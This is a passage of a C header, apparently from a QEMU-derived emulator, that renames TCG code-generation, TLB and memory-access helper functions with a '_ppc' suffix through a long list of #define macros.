tcg_region_reset_all_ppc #define tcg_region_init tcg_region_init_ppc #define tcg_code_size tcg_code_size_ppc #define tcg_code_capacity tcg_code_capacity_ppc #define tcg_tb_phys_invalidate_count tcg_tb_phys_invalidate_count_ppc #define tcg_malloc_internal tcg_malloc_internal_ppc #define tcg_pool_reset tcg_pool_reset_ppc #define tcg_context_init tcg_context_init_ppc #define tcg_tb_alloc tcg_tb_alloc_ppc #define tcg_prologue_init tcg_prologue_init_ppc #define tcg_func_start tcg_func_start_ppc #define tcg_set_frame tcg_set_frame_ppc #define tcg_global_mem_new_internal tcg_global_mem_new_internal_ppc #define tcg_temp_new_internal tcg_temp_new_internal_ppc #define tcg_temp_new_vec tcg_temp_new_vec_ppc #define tcg_temp_new_vec_matching tcg_temp_new_vec_matching_ppc #define tcg_temp_free_internal tcg_temp_free_internal_ppc #define tcg_const_i32 tcg_const_i32_ppc #define tcg_const_i64 tcg_const_i64_ppc #define tcg_const_local_i32 tcg_const_local_i32_ppc #define tcg_const_local_i64 tcg_const_local_i64_ppc #define tcg_op_supported tcg_op_supported_ppc #define tcg_gen_callN tcg_gen_callN_ppc #define tcg_op_remove tcg_op_remove_ppc #define tcg_emit_op tcg_emit_op_ppc #define tcg_op_insert_before tcg_op_insert_before_ppc #define tcg_op_insert_after tcg_op_insert_after_ppc #define tcg_cpu_exec_time tcg_cpu_exec_time_ppc #define tcg_gen_code tcg_gen_code_ppc #define tcg_gen_op1 tcg_gen_op1_ppc #define tcg_gen_op2 tcg_gen_op2_ppc #define tcg_gen_op3 tcg_gen_op3_ppc #define tcg_gen_op4 tcg_gen_op4_ppc #define tcg_gen_op5 tcg_gen_op5_ppc #define tcg_gen_op6 tcg_gen_op6_ppc #define tcg_gen_mb tcg_gen_mb_ppc #define tcg_gen_addi_i32 tcg_gen_addi_i32_ppc #define tcg_gen_subfi_i32 tcg_gen_subfi_i32_ppc #define tcg_gen_subi_i32 tcg_gen_subi_i32_ppc #define tcg_gen_andi_i32 tcg_gen_andi_i32_ppc #define tcg_gen_ori_i32 tcg_gen_ori_i32_ppc #define tcg_gen_xori_i32 tcg_gen_xori_i32_ppc #define tcg_gen_shli_i32 tcg_gen_shli_i32_ppc #define tcg_gen_shri_i32 tcg_gen_shri_i32_ppc #define tcg_gen_sari_i32 tcg_gen_sari_i32_ppc #define tcg_gen_brcond_i32 tcg_gen_brcond_i32_ppc #define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_ppc #define tcg_gen_setcond_i32 tcg_gen_setcond_i32_ppc #define tcg_gen_setcondi_i32 tcg_gen_setcondi_i32_ppc #define tcg_gen_muli_i32 tcg_gen_muli_i32_ppc #define tcg_gen_div_i32 tcg_gen_div_i32_ppc #define tcg_gen_rem_i32 tcg_gen_rem_i32_ppc #define tcg_gen_divu_i32 tcg_gen_divu_i32_ppc #define tcg_gen_remu_i32 tcg_gen_remu_i32_ppc #define tcg_gen_andc_i32 tcg_gen_andc_i32_ppc #define tcg_gen_eqv_i32 tcg_gen_eqv_i32_ppc #define tcg_gen_nand_i32 tcg_gen_nand_i32_ppc #define tcg_gen_nor_i32 tcg_gen_nor_i32_ppc #define tcg_gen_orc_i32 tcg_gen_orc_i32_ppc #define tcg_gen_clz_i32 tcg_gen_clz_i32_ppc #define tcg_gen_clzi_i32 tcg_gen_clzi_i32_ppc #define tcg_gen_ctz_i32 tcg_gen_ctz_i32_ppc #define tcg_gen_ctzi_i32 tcg_gen_ctzi_i32_ppc #define tcg_gen_clrsb_i32 tcg_gen_clrsb_i32_ppc #define tcg_gen_ctpop_i32 tcg_gen_ctpop_i32_ppc #define tcg_gen_rotl_i32 tcg_gen_rotl_i32_ppc #define tcg_gen_rotli_i32 tcg_gen_rotli_i32_ppc #define tcg_gen_rotr_i32 tcg_gen_rotr_i32_ppc #define tcg_gen_rotri_i32 tcg_gen_rotri_i32_ppc #define tcg_gen_deposit_i32 tcg_gen_deposit_i32_ppc #define tcg_gen_deposit_z_i32 tcg_gen_deposit_z_i32_ppc #define tcg_gen_extract_i32 tcg_gen_extract_i32_ppc #define tcg_gen_sextract_i32 tcg_gen_sextract_i32_ppc #define tcg_gen_extract2_i32 tcg_gen_extract2_i32_ppc #define tcg_gen_movcond_i32 tcg_gen_movcond_i32_ppc #define tcg_gen_add2_i32 tcg_gen_add2_i32_ppc #define tcg_gen_sub2_i32 tcg_gen_sub2_i32_ppc #define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_ppc #define tcg_gen_muls2_i32 tcg_gen_muls2_i32_ppc #define tcg_gen_mulsu2_i32 tcg_gen_mulsu2_i32_ppc #define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_ppc #define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_ppc #define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_ppc #define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_ppc #define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_ppc #define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_ppc #define tcg_gen_smin_i32 tcg_gen_smin_i32_ppc #define tcg_gen_umin_i32 tcg_gen_umin_i32_ppc #define tcg_gen_smax_i32 tcg_gen_smax_i32_ppc #define tcg_gen_umax_i32 tcg_gen_umax_i32_ppc #define tcg_gen_abs_i32 tcg_gen_abs_i32_ppc #define tcg_gen_addi_i64 tcg_gen_addi_i64_ppc #define tcg_gen_subfi_i64 tcg_gen_subfi_i64_ppc #define tcg_gen_subi_i64 tcg_gen_subi_i64_ppc #define tcg_gen_andi_i64 tcg_gen_andi_i64_ppc #define tcg_gen_ori_i64 tcg_gen_ori_i64_ppc #define tcg_gen_xori_i64 tcg_gen_xori_i64_ppc #define tcg_gen_shli_i64 tcg_gen_shli_i64_ppc #define tcg_gen_shri_i64 tcg_gen_shri_i64_ppc #define tcg_gen_sari_i64 tcg_gen_sari_i64_ppc #define tcg_gen_brcond_i64 tcg_gen_brcond_i64_ppc #define tcg_gen_brcondi_i64 tcg_gen_brcondi_i64_ppc #define tcg_gen_setcond_i64 tcg_gen_setcond_i64_ppc #define tcg_gen_setcondi_i64 tcg_gen_setcondi_i64_ppc #define tcg_gen_muli_i64 tcg_gen_muli_i64_ppc #define tcg_gen_div_i64 tcg_gen_div_i64_ppc #define tcg_gen_rem_i64 tcg_gen_rem_i64_ppc #define tcg_gen_divu_i64 tcg_gen_divu_i64_ppc #define tcg_gen_remu_i64 tcg_gen_remu_i64_ppc #define tcg_gen_ext8s_i64 tcg_gen_ext8s_i64_ppc #define tcg_gen_ext16s_i64 tcg_gen_ext16s_i64_ppc #define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_ppc #define tcg_gen_ext8u_i64 tcg_gen_ext8u_i64_ppc #define tcg_gen_ext16u_i64 tcg_gen_ext16u_i64_ppc #define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_ppc #define tcg_gen_bswap16_i64 tcg_gen_bswap16_i64_ppc #define tcg_gen_bswap32_i64 tcg_gen_bswap32_i64_ppc #define tcg_gen_bswap64_i64 tcg_gen_bswap64_i64_ppc #define tcg_gen_not_i64 tcg_gen_not_i64_ppc #define tcg_gen_andc_i64 tcg_gen_andc_i64_ppc #define tcg_gen_eqv_i64 tcg_gen_eqv_i64_ppc #define tcg_gen_nand_i64 tcg_gen_nand_i64_ppc #define tcg_gen_nor_i64 tcg_gen_nor_i64_ppc #define tcg_gen_orc_i64 tcg_gen_orc_i64_ppc #define tcg_gen_clz_i64 tcg_gen_clz_i64_ppc #define tcg_gen_clzi_i64 tcg_gen_clzi_i64_ppc #define tcg_gen_ctz_i64 tcg_gen_ctz_i64_ppc #define tcg_gen_ctzi_i64 tcg_gen_ctzi_i64_ppc #define tcg_gen_clrsb_i64 tcg_gen_clrsb_i64_ppc #define tcg_gen_ctpop_i64 tcg_gen_ctpop_i64_ppc #define tcg_gen_rotl_i64 tcg_gen_rotl_i64_ppc #define tcg_gen_rotli_i64 tcg_gen_rotli_i64_ppc #define tcg_gen_rotr_i64 tcg_gen_rotr_i64_ppc #define tcg_gen_rotri_i64 tcg_gen_rotri_i64_ppc #define tcg_gen_deposit_i64 tcg_gen_deposit_i64_ppc #define tcg_gen_deposit_z_i64 tcg_gen_deposit_z_i64_ppc #define tcg_gen_extract_i64 tcg_gen_extract_i64_ppc #define tcg_gen_sextract_i64 tcg_gen_sextract_i64_ppc #define tcg_gen_extract2_i64 tcg_gen_extract2_i64_ppc #define tcg_gen_movcond_i64 tcg_gen_movcond_i64_ppc #define tcg_gen_add2_i64 tcg_gen_add2_i64_ppc #define tcg_gen_sub2_i64 tcg_gen_sub2_i64_ppc #define tcg_gen_mulu2_i64 tcg_gen_mulu2_i64_ppc #define tcg_gen_muls2_i64 tcg_gen_muls2_i64_ppc #define tcg_gen_mulsu2_i64 tcg_gen_mulsu2_i64_ppc #define tcg_gen_smin_i64 tcg_gen_smin_i64_ppc #define tcg_gen_umin_i64 tcg_gen_umin_i64_ppc #define tcg_gen_smax_i64 tcg_gen_smax_i64_ppc #define tcg_gen_umax_i64 tcg_gen_umax_i64_ppc #define tcg_gen_abs_i64 tcg_gen_abs_i64_ppc #define tcg_gen_extrl_i64_i32 tcg_gen_extrl_i64_i32_ppc #define tcg_gen_extrh_i64_i32 tcg_gen_extrh_i64_i32_ppc #define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_ppc #define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_ppc #define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_ppc #define tcg_gen_extr_i64_i32 tcg_gen_extr_i64_i32_ppc #define tcg_gen_extr32_i64 tcg_gen_extr32_i64_ppc #define tcg_gen_exit_tb tcg_gen_exit_tb_ppc #define tcg_gen_goto_tb tcg_gen_goto_tb_ppc #define tcg_gen_lookup_and_goto_ptr tcg_gen_lookup_and_goto_ptr_ppc #define check_exit_request check_exit_request_ppc #define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_ppc #define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_ppc #define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_ppc #define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_ppc #define tcg_gen_atomic_cmpxchg_i32 tcg_gen_atomic_cmpxchg_i32_ppc #define tcg_gen_atomic_cmpxchg_i64 tcg_gen_atomic_cmpxchg_i64_ppc #define tcg_gen_atomic_fetch_add_i32 tcg_gen_atomic_fetch_add_i32_ppc #define tcg_gen_atomic_fetch_add_i64 tcg_gen_atomic_fetch_add_i64_ppc #define tcg_gen_atomic_fetch_and_i32 tcg_gen_atomic_fetch_and_i32_ppc #define tcg_gen_atomic_fetch_and_i64 tcg_gen_atomic_fetch_and_i64_ppc #define tcg_gen_atomic_fetch_or_i32 tcg_gen_atomic_fetch_or_i32_ppc #define tcg_gen_atomic_fetch_or_i64 tcg_gen_atomic_fetch_or_i64_ppc #define tcg_gen_atomic_fetch_xor_i32 tcg_gen_atomic_fetch_xor_i32_ppc #define tcg_gen_atomic_fetch_xor_i64 tcg_gen_atomic_fetch_xor_i64_ppc #define tcg_gen_atomic_fetch_smin_i32 tcg_gen_atomic_fetch_smin_i32_ppc #define tcg_gen_atomic_fetch_smin_i64 tcg_gen_atomic_fetch_smin_i64_ppc #define tcg_gen_atomic_fetch_umin_i32 tcg_gen_atomic_fetch_umin_i32_ppc #define tcg_gen_atomic_fetch_umin_i64 tcg_gen_atomic_fetch_umin_i64_ppc #define tcg_gen_atomic_fetch_smax_i32 tcg_gen_atomic_fetch_smax_i32_ppc #define tcg_gen_atomic_fetch_smax_i64 tcg_gen_atomic_fetch_smax_i64_ppc #define tcg_gen_atomic_fetch_umax_i32 tcg_gen_atomic_fetch_umax_i32_ppc #define tcg_gen_atomic_fetch_umax_i64 tcg_gen_atomic_fetch_umax_i64_ppc #define tcg_gen_atomic_add_fetch_i32 tcg_gen_atomic_add_fetch_i32_ppc #define tcg_gen_atomic_add_fetch_i64 tcg_gen_atomic_add_fetch_i64_ppc #define tcg_gen_atomic_and_fetch_i32 tcg_gen_atomic_and_fetch_i32_ppc #define tcg_gen_atomic_and_fetch_i64 tcg_gen_atomic_and_fetch_i64_ppc #define tcg_gen_atomic_or_fetch_i32 tcg_gen_atomic_or_fetch_i32_ppc #define tcg_gen_atomic_or_fetch_i64 tcg_gen_atomic_or_fetch_i64_ppc #define tcg_gen_atomic_xor_fetch_i32 tcg_gen_atomic_xor_fetch_i32_ppc #define tcg_gen_atomic_xor_fetch_i64 tcg_gen_atomic_xor_fetch_i64_ppc #define tcg_gen_atomic_smin_fetch_i32 tcg_gen_atomic_smin_fetch_i32_ppc #define tcg_gen_atomic_smin_fetch_i64 tcg_gen_atomic_smin_fetch_i64_ppc #define tcg_gen_atomic_umin_fetch_i32 tcg_gen_atomic_umin_fetch_i32_ppc #define tcg_gen_atomic_umin_fetch_i64 tcg_gen_atomic_umin_fetch_i64_ppc #define tcg_gen_atomic_smax_fetch_i32 tcg_gen_atomic_smax_fetch_i32_ppc #define tcg_gen_atomic_smax_fetch_i64 tcg_gen_atomic_smax_fetch_i64_ppc #define tcg_gen_atomic_umax_fetch_i32 tcg_gen_atomic_umax_fetch_i32_ppc #define tcg_gen_atomic_umax_fetch_i64 tcg_gen_atomic_umax_fetch_i64_ppc #define tcg_gen_atomic_xchg_i32 tcg_gen_atomic_xchg_i32_ppc #define tcg_gen_atomic_xchg_i64 tcg_gen_atomic_xchg_i64_ppc #define simd_desc simd_desc_ppc #define tcg_gen_gvec_2_ool tcg_gen_gvec_2_ool_ppc #define tcg_gen_gvec_2i_ool tcg_gen_gvec_2i_ool_ppc #define tcg_gen_gvec_3_ool tcg_gen_gvec_3_ool_ppc #define tcg_gen_gvec_4_ool tcg_gen_gvec_4_ool_ppc #define tcg_gen_gvec_5_ool tcg_gen_gvec_5_ool_ppc #define tcg_gen_gvec_2_ptr tcg_gen_gvec_2_ptr_ppc #define tcg_gen_gvec_3_ptr tcg_gen_gvec_3_ptr_ppc #define tcg_gen_gvec_4_ptr tcg_gen_gvec_4_ptr_ppc #define tcg_gen_gvec_5_ptr tcg_gen_gvec_5_ptr_ppc #define tcg_gen_gvec_2 tcg_gen_gvec_2_ppc #define tcg_gen_gvec_2i tcg_gen_gvec_2i_ppc #define tcg_gen_gvec_2s tcg_gen_gvec_2s_ppc #define tcg_gen_gvec_3 tcg_gen_gvec_3_ppc #define tcg_gen_gvec_3i tcg_gen_gvec_3i_ppc #define tcg_gen_gvec_4 tcg_gen_gvec_4_ppc #define tcg_gen_gvec_mov tcg_gen_gvec_mov_ppc #define tcg_gen_gvec_dup_i32 tcg_gen_gvec_dup_i32_ppc #define tcg_gen_gvec_dup_i64 tcg_gen_gvec_dup_i64_ppc #define tcg_gen_gvec_dup_mem tcg_gen_gvec_dup_mem_ppc #define tcg_gen_gvec_dup64i tcg_gen_gvec_dup64i_ppc #define tcg_gen_gvec_dup32i tcg_gen_gvec_dup32i_ppc #define tcg_gen_gvec_dup16i tcg_gen_gvec_dup16i_ppc #define tcg_gen_gvec_dup8i tcg_gen_gvec_dup8i_ppc #define tcg_gen_gvec_not tcg_gen_gvec_not_ppc #define tcg_gen_vec_add8_i64 tcg_gen_vec_add8_i64_ppc #define tcg_gen_vec_add16_i64 tcg_gen_vec_add16_i64_ppc #define tcg_gen_vec_add32_i64 tcg_gen_vec_add32_i64_ppc #define tcg_gen_gvec_add tcg_gen_gvec_add_ppc #define tcg_gen_gvec_adds tcg_gen_gvec_adds_ppc #define tcg_gen_gvec_addi tcg_gen_gvec_addi_ppc #define tcg_gen_gvec_subs tcg_gen_gvec_subs_ppc #define tcg_gen_vec_sub8_i64 tcg_gen_vec_sub8_i64_ppc #define tcg_gen_vec_sub16_i64 tcg_gen_vec_sub16_i64_ppc #define tcg_gen_vec_sub32_i64 tcg_gen_vec_sub32_i64_ppc #define tcg_gen_gvec_sub tcg_gen_gvec_sub_ppc #define tcg_gen_gvec_mul tcg_gen_gvec_mul_ppc #define tcg_gen_gvec_muls tcg_gen_gvec_muls_ppc #define tcg_gen_gvec_muli tcg_gen_gvec_muli_ppc #define tcg_gen_gvec_ssadd tcg_gen_gvec_ssadd_ppc #define tcg_gen_gvec_sssub tcg_gen_gvec_sssub_ppc #define tcg_gen_gvec_usadd tcg_gen_gvec_usadd_ppc #define tcg_gen_gvec_ussub tcg_gen_gvec_ussub_ppc #define tcg_gen_gvec_smin tcg_gen_gvec_smin_ppc #define tcg_gen_gvec_umin tcg_gen_gvec_umin_ppc #define tcg_gen_gvec_smax tcg_gen_gvec_smax_ppc #define tcg_gen_gvec_umax tcg_gen_gvec_umax_ppc #define tcg_gen_vec_neg8_i64 tcg_gen_vec_neg8_i64_ppc #define tcg_gen_vec_neg16_i64 tcg_gen_vec_neg16_i64_ppc #define tcg_gen_vec_neg32_i64 tcg_gen_vec_neg32_i64_ppc #define tcg_gen_gvec_neg tcg_gen_gvec_neg_ppc #define tcg_gen_gvec_abs tcg_gen_gvec_abs_ppc #define tcg_gen_gvec_and tcg_gen_gvec_and_ppc #define tcg_gen_gvec_or tcg_gen_gvec_or_ppc #define tcg_gen_gvec_xor tcg_gen_gvec_xor_ppc #define tcg_gen_gvec_andc tcg_gen_gvec_andc_ppc #define tcg_gen_gvec_orc tcg_gen_gvec_orc_ppc #define tcg_gen_gvec_nand tcg_gen_gvec_nand_ppc #define tcg_gen_gvec_nor tcg_gen_gvec_nor_ppc #define tcg_gen_gvec_eqv tcg_gen_gvec_eqv_ppc #define tcg_gen_gvec_ands tcg_gen_gvec_ands_ppc #define tcg_gen_gvec_andi tcg_gen_gvec_andi_ppc #define tcg_gen_gvec_xors tcg_gen_gvec_xors_ppc #define tcg_gen_gvec_xori tcg_gen_gvec_xori_ppc #define tcg_gen_gvec_ors tcg_gen_gvec_ors_ppc #define tcg_gen_gvec_ori tcg_gen_gvec_ori_ppc #define tcg_gen_vec_shl8i_i64 tcg_gen_vec_shl8i_i64_ppc #define tcg_gen_vec_shl16i_i64 tcg_gen_vec_shl16i_i64_ppc #define tcg_gen_gvec_shli tcg_gen_gvec_shli_ppc #define tcg_gen_vec_shr8i_i64 tcg_gen_vec_shr8i_i64_ppc #define tcg_gen_vec_shr16i_i64 tcg_gen_vec_shr16i_i64_ppc #define tcg_gen_gvec_shri tcg_gen_gvec_shri_ppc #define tcg_gen_vec_sar8i_i64 tcg_gen_vec_sar8i_i64_ppc #define tcg_gen_vec_sar16i_i64 tcg_gen_vec_sar16i_i64_ppc #define tcg_gen_gvec_sari tcg_gen_gvec_sari_ppc #define tcg_gen_gvec_shls tcg_gen_gvec_shls_ppc #define tcg_gen_gvec_shrs tcg_gen_gvec_shrs_ppc #define tcg_gen_gvec_sars tcg_gen_gvec_sars_ppc #define tcg_gen_gvec_shlv tcg_gen_gvec_shlv_ppc #define tcg_gen_gvec_shrv tcg_gen_gvec_shrv_ppc #define tcg_gen_gvec_sarv tcg_gen_gvec_sarv_ppc #define tcg_gen_gvec_cmp tcg_gen_gvec_cmp_ppc #define tcg_gen_gvec_bitsel tcg_gen_gvec_bitsel_ppc #define tcg_can_emit_vecop_list tcg_can_emit_vecop_list_ppc #define vec_gen_2 vec_gen_2_ppc #define vec_gen_3 vec_gen_3_ppc #define vec_gen_4 vec_gen_4_ppc #define tcg_gen_mov_vec tcg_gen_mov_vec_ppc #define tcg_const_zeros_vec tcg_const_zeros_vec_ppc #define tcg_const_ones_vec tcg_const_ones_vec_ppc #define tcg_const_zeros_vec_matching tcg_const_zeros_vec_matching_ppc #define tcg_const_ones_vec_matching tcg_const_ones_vec_matching_ppc #define tcg_gen_dup64i_vec tcg_gen_dup64i_vec_ppc #define tcg_gen_dup32i_vec tcg_gen_dup32i_vec_ppc #define tcg_gen_dup16i_vec tcg_gen_dup16i_vec_ppc #define tcg_gen_dup8i_vec tcg_gen_dup8i_vec_ppc #define tcg_gen_dupi_vec tcg_gen_dupi_vec_ppc #define tcg_gen_dup_i64_vec tcg_gen_dup_i64_vec_ppc #define tcg_gen_dup_i32_vec tcg_gen_dup_i32_vec_ppc #define tcg_gen_dup_mem_vec tcg_gen_dup_mem_vec_ppc #define tcg_gen_ld_vec tcg_gen_ld_vec_ppc #define tcg_gen_st_vec tcg_gen_st_vec_ppc #define tcg_gen_stl_vec tcg_gen_stl_vec_ppc #define tcg_gen_and_vec tcg_gen_and_vec_ppc #define tcg_gen_or_vec tcg_gen_or_vec_ppc #define tcg_gen_xor_vec tcg_gen_xor_vec_ppc #define tcg_gen_andc_vec tcg_gen_andc_vec_ppc #define tcg_gen_orc_vec tcg_gen_orc_vec_ppc #define tcg_gen_nand_vec tcg_gen_nand_vec_ppc #define tcg_gen_nor_vec tcg_gen_nor_vec_ppc #define tcg_gen_eqv_vec tcg_gen_eqv_vec_ppc #define tcg_gen_not_vec tcg_gen_not_vec_ppc #define tcg_gen_neg_vec tcg_gen_neg_vec_ppc #define tcg_gen_abs_vec tcg_gen_abs_vec_ppc #define tcg_gen_shli_vec tcg_gen_shli_vec_ppc #define tcg_gen_shri_vec tcg_gen_shri_vec_ppc #define tcg_gen_sari_vec tcg_gen_sari_vec_ppc #define tcg_gen_cmp_vec tcg_gen_cmp_vec_ppc #define tcg_gen_add_vec tcg_gen_add_vec_ppc #define tcg_gen_sub_vec tcg_gen_sub_vec_ppc #define tcg_gen_mul_vec tcg_gen_mul_vec_ppc #define tcg_gen_ssadd_vec tcg_gen_ssadd_vec_ppc #define tcg_gen_usadd_vec tcg_gen_usadd_vec_ppc #define tcg_gen_sssub_vec tcg_gen_sssub_vec_ppc #define tcg_gen_ussub_vec tcg_gen_ussub_vec_ppc #define tcg_gen_smin_vec tcg_gen_smin_vec_ppc #define tcg_gen_umin_vec tcg_gen_umin_vec_ppc #define tcg_gen_smax_vec tcg_gen_smax_vec_ppc #define tcg_gen_umax_vec tcg_gen_umax_vec_ppc #define tcg_gen_shlv_vec tcg_gen_shlv_vec_ppc #define tcg_gen_shrv_vec tcg_gen_shrv_vec_ppc #define tcg_gen_sarv_vec tcg_gen_sarv_vec_ppc #define tcg_gen_shls_vec tcg_gen_shls_vec_ppc #define tcg_gen_shrs_vec tcg_gen_shrs_vec_ppc #define tcg_gen_sars_vec tcg_gen_sars_vec_ppc #define tcg_gen_bitsel_vec tcg_gen_bitsel_vec_ppc #define tcg_gen_cmpsel_vec tcg_gen_cmpsel_vec_ppc #define tb_htable_lookup tb_htable_lookup_ppc #define tb_set_jmp_target tb_set_jmp_target_ppc #define cpu_exec cpu_exec_ppc #define cpu_loop_exit_noexc cpu_loop_exit_noexc_ppc #define cpu_reloading_memory_map cpu_reloading_memory_map_ppc #define cpu_loop_exit cpu_loop_exit_ppc #define cpu_loop_exit_restore cpu_loop_exit_restore_ppc #define cpu_loop_exit_atomic cpu_loop_exit_atomic_ppc #define tlb_init tlb_init_ppc #define tlb_flush_by_mmuidx tlb_flush_by_mmuidx_ppc #define tlb_flush tlb_flush_ppc #define tlb_flush_by_mmuidx_all_cpus tlb_flush_by_mmuidx_all_cpus_ppc #define tlb_flush_all_cpus tlb_flush_all_cpus_ppc #define tlb_flush_by_mmuidx_all_cpus_synced tlb_flush_by_mmuidx_all_cpus_synced_ppc #define tlb_flush_all_cpus_synced tlb_flush_all_cpus_synced_ppc #define tlb_flush_page_by_mmuidx tlb_flush_page_by_mmuidx_ppc #define tlb_flush_page tlb_flush_page_ppc #define tlb_flush_page_by_mmuidx_all_cpus tlb_flush_page_by_mmuidx_all_cpus_ppc #define tlb_flush_page_all_cpus tlb_flush_page_all_cpus_ppc #define tlb_flush_page_by_mmuidx_all_cpus_synced tlb_flush_page_by_mmuidx_all_cpus_synced_ppc #define tlb_flush_page_all_cpus_synced tlb_flush_page_all_cpus_synced_ppc #define tlb_protect_code tlb_protect_code_ppc #define tlb_unprotect_code tlb_unprotect_code_ppc #define tlb_reset_dirty tlb_reset_dirty_ppc #define tlb_set_dirty tlb_set_dirty_ppc #define tlb_set_page_with_attrs tlb_set_page_with_attrs_ppc #define tlb_set_page tlb_set_page_ppc #define get_page_addr_code_hostp get_page_addr_code_hostp_ppc #define get_page_addr_code get_page_addr_code_ppc #define probe_access probe_access_ppc #define tlb_vaddr_to_host tlb_vaddr_to_host_ppc #define helper_ret_ldub_mmu helper_ret_ldub_mmu_ppc #define helper_le_lduw_mmu helper_le_lduw_mmu_ppc #define helper_be_lduw_mmu helper_be_lduw_mmu_ppc #define helper_le_ldul_mmu helper_le_ldul_mmu_ppc #define helper_be_ldul_mmu helper_be_ldul_mmu_ppc #define helper_le_ldq_mmu helper_le_ldq_mmu_ppc #define helper_be_ldq_mmu helper_be_ldq_mmu_ppc #define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_ppc #define helper_le_ldsw_mmu helper_le_ldsw_mmu_ppc #define helper_be_ldsw_mmu helper_be_ldsw_mmu_ppc #define helper_le_ldsl_mmu helper_le_ldsl_mmu_ppc #define helper_be_ldsl_mmu helper_be_ldsl_mmu_ppc #define cpu_ldub_mmuidx_ra cpu_ldub_mmuidx_ra_ppc #define cpu_ldsb_mmuidx_ra cpu_ldsb_mmuidx_ra_ppc #define cpu_lduw_mmuidx_ra cpu_lduw_mmuidx_ra_ppc #define cpu_ldsw_mmuidx_ra cpu_ldsw_mmuidx_ra_ppc #define cpu_ldl_mmuidx_ra cpu_ldl_mmuidx_ra_ppc #define cpu_ldq_mmuidx_ra cpu_ldq_mmuidx_ra_ppc #define cpu_ldub_data_ra cpu_ldub_data_ra_ppc #define cpu_ldsb_data_ra cpu_ldsb_data_ra_ppc #define cpu_lduw_data_ra cpu_lduw_data_ra_ppc #define cpu_ldsw_data_ra cpu_ldsw_data_ra_ppc #define cpu_ldl_data_ra cpu_ldl_data_ra_ppc #define cpu_ldq_data_ra cpu_ldq_data_ra_ppc #define cpu_ldub_data cpu_ldub_data_ppc #define cpu_ldsb_data cpu_ldsb_data_ppc #define cpu_lduw_data cpu_lduw_data_ppc #define cpu_ldsw_data cpu_ldsw_data_ppc #define cpu_ldl_data cpu_ldl_data_ppc #define cpu_ldq_data cpu_ldq_data_ppc #define helper_ret_stb_mmu helper_ret_stb_mmu_ppc #define helper_le_stw_mmu helper_le_stw_mmu_ppc #define helper_be_stw_mmu helper_be_stw_mmu_ppc #define helper_le_stl_mmu helper_le_stl_mmu_ppc #define helper_be_stl_mmu helper_be_stl_mmu_ppc #define helper_le_stq_mmu helper_le_stq_mmu_ppc #define helper_be_stq_mmu helper_be_stq_mmu_ppc #define cpu_stb_mmuidx_ra cpu_stb_mmuidx_ra_ppc #define cpu_stw_mmuidx_ra cpu_stw_mmuidx_ra_ppc #define cpu_stl_mmuidx_ra cpu_stl_mmuidx_ra_ppc #define cpu_stq_mmuidx_ra cpu_stq_mmuidx_ra_ppc #define cpu_stb_data_ra cpu_stb_data_ra_ppc #define cpu_stw_data_ra cpu_stw_data_ra_ppc #define cpu_stl_data_ra cpu_stl_data_ra_ppc #define cpu_stq_data_ra cpu_stq_data_ra_ppc #define cpu_stb_data cpu_stb_data_ppc #define cpu_stw_data cpu_stw_data_ppc #define cpu_stl_data cpu_stl_data_ppc #define cpu_stq_data cpu_stq_data_ppc #define helper_atomic_cmpxchgb_mmu helper_atomic_cmpxchgb_mmu_ppc #define helper_atomic_xchgb_mmu helper_atomic_xchgb_mmu_ppc #define helper_atomic_fetch_addb_mmu helper_atomic_fetch_addb_mmu_ppc #define helper_atomic_fetch_andb_mmu helper_atomic_fetch_andb_mmu_ppc #define helper_atomic_fetch_orb_mmu helper_atomic_fetch_orb_mmu_ppc #define helper_atomic_fetch_xorb_mmu helper_atomic_fetch_xorb_mmu_ppc #define helper_atomic_add_fetchb_mmu helper_atomic_add_fetchb_mmu_ppc #define helper_atomic_and_fetchb_mmu helper_atomic_and_fetchb_mmu_ppc #define helper_atomic_or_fetchb_mmu helper_atomic_or_fetchb_mmu_ppc #define helper_atomic_xor_fetchb_mmu helper_atomic_xor_fetchb_mmu_ppc #define helper_atomic_fetch_sminb_mmu helper_atomic_fetch_sminb_mmu_ppc #define helper_atomic_fetch_uminb_mmu helper_atomic_fetch_uminb_mmu_ppc #define helper_atomic_fetch_smaxb_mmu helper_atomic_fetch_smaxb_mmu_ppc #define helper_atomic_fetch_umaxb_mmu helper_atomic_fetch_umaxb_mmu_ppc #define helper_atomic_smin_fetchb_mmu helper_atomic_smin_fetchb_mmu_ppc #define helper_atomic_umin_fetchb_mmu helper_atomic_umin_fetchb_mmu_ppc #define helper_atomic_smax_fetchb_mmu helper_atomic_smax_fetchb_mmu_ppc #define helper_atomic_umax_fetchb_mmu helper_atomic_umax_fetchb_mmu_ppc #define helper_atomic_cmpxchgw_le_mmu helper_atomic_cmpxchgw_le_mmu_ppc #define helper_atomic_xchgw_le_mmu helper_atomic_xchgw_le_mmu_ppc #define helper_atomic_fetch_addw_le_mmu helper_atomic_fetch_addw_le_mmu_ppc #define helper_atomic_fetch_andw_le_mmu helper_atomic_fetch_andw_le_mmu_ppc #define helper_atomic_fetch_orw_le_mmu helper_atomic_fetch_orw_le_mmu_ppc #define helper_atomic_fetch_xorw_le_mmu helper_atomic_fetch_xorw_le_mmu_ppc #define helper_atomic_add_fetchw_le_mmu helper_atomic_add_fetchw_le_mmu_ppc #define helper_atomic_and_fetchw_le_mmu helper_atomic_and_fetchw_le_mmu_ppc #define helper_atomic_or_fetchw_le_mmu helper_atomic_or_fetchw_le_mmu_ppc #define helper_atomic_xor_fetchw_le_mmu helper_atomic_xor_fetchw_le_mmu_ppc #define helper_atomic_fetch_sminw_le_mmu helper_atomic_fetch_sminw_le_mmu_ppc #define helper_atomic_fetch_uminw_le_mmu 